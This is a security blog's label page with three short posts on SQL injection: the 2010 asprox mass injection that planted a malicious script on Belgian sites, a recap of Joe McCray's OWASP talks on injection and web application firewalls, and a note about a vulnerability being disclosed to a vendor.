Showing posts with label SQL injection. Show all posts
Showing posts with label SQL injection. Show all posts

Wednesday, June 30, 2010

From Russia with love - asprox

Tonight i found in my RSS reader that a large amount of websites (some very popular ones in Belgium) are infected with ru/js.js.

It appears that this would come from a trojan call asprox. Originally it was spreading through spam via the Pushdo botnet but the attack vector seemed to have changed.

The new attack vector was possible thanks to SQL Injection. Rondel Mendez wrote an excellent piece about it for M86 security. It explains what de malware does.

The syscolumns xtypes it abuses are, 35 which is text, 99 which is ntext, 167 which is varchar, and 231 which is sysname. As you can see all of which can contain a string which in this case is a url to the botnet.

How to solve this? Simple fix your code, never trust user input, normalize it and check it if the values are acceptable.
Posted by at No comments:
Labels: , , ,

Thursday, June 17, 2010

Meet Joe McCray

Yesterday there was a last minute OWASP chapter meeting and 2 presentations by Joe McCray of learnsecurityonline.com. The intro was great: Joe loves hacking, swearing and drinking rum and coke (a.k.a Cuba Libre).

The first presentation was about SQL Injection. Most things Joe talked about where things I already knew but it is always interesting to hear somebody explain how he or she does it, and yes, I've learned new things. I have been to presentations where they had prepared a VM with a vulnerable webapp but not Joe. He did his demo on a live website and enumerated all databases on the webserver. He explained in great detail what kind of injections there are and the conclusion was "Fix your shit". He demonstrated how IDS can help you but is not a silver bullet.

The most important thing I took home from this presentation is that he experienced that not everybody terminates SSL connections, normalized the input and then feeds it to the IDS ... and of course "Fix your shit" :). At the end of the evening we discussed what is the easiest way to get the stuff fixed and his experience was to get vulnerabilities classified as bug by the Quality Assurance people. I think this is a trick I will apply in the future :)


The second presentation was about Web Application Firewalls. I have no experience with application firewalls. I saw some presentations in the past and Joe confirmed what I was thinking about it. It is something to give you some time to "fix your shit" but not the solution.

Joe is coming to BruCon in September 2010 to give a session titled "You Spent All That Money And You Still Got Owned".
Posted by at No comments:
Labels: , , ,

Wednesday, October 22, 2008

Doing some research

Howdy,



It has been a while since my last post but i have been busy. I've found a SQL injection vulnerabilty in a product and I am researching it. It is quite a major problem when you inject it returns login, password, server.

I will post more details later but now I have to contact the vendor.
Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)